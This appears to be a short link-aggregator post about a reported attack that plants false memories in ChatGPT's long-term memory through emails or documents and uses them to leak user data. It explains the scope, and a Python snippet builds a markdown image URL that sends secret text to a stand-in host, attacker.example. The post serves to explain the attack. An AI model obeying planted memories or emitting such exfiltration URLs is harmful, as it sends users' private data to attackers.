Hacker plants false memories in ChatGPT to steal user data in perpetuity (arstechnica.com)
Emails, documents, and other untrusted content can plant malicious memories.
tldr
- It affects the desktop app of ChatGPT, and likely any client that offers long-term memory functionality.
- It does not apply to the web interface.
- It does not apply to API access.
- The data exfiltration is visible to the user, since ChatGPT streams the tokens that form the exfiltration URL as a (fake) markdown image.
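That last point can be sketched in a few lines. The core exfiltration primitive (described in the article) is a markdown image whose URL carries stolen text as a query parameter: when a client renders the markdown, it fetches the "image" and thereby sends the data to the attacker's server. The endpoint and parameter name below are hypothetical, for illustration only:

```python
from urllib.parse import quote

# Hypothetical attacker-controlled endpoint -- illustration only.
ATTACKER_URL = "https://attacker.example/collect"

def exfil_markdown_image(secret: str) -> str:
    """Encode text into a markdown image whose URL leaks it.

    A client that renders this markdown will issue a GET request
    for the "image", transmitting `secret` in the query string.
    """
    return f"![img]({ATTACKER_URL}?q={quote(secret)})"

# The streamed tokens forming this URL are what the user can see.
print(exfil_markdown_image("user message contents"))
```

This is also why the attack is visible in the transcript: the full URL, including the encoded data, has to appear in the model's output before the client renders it.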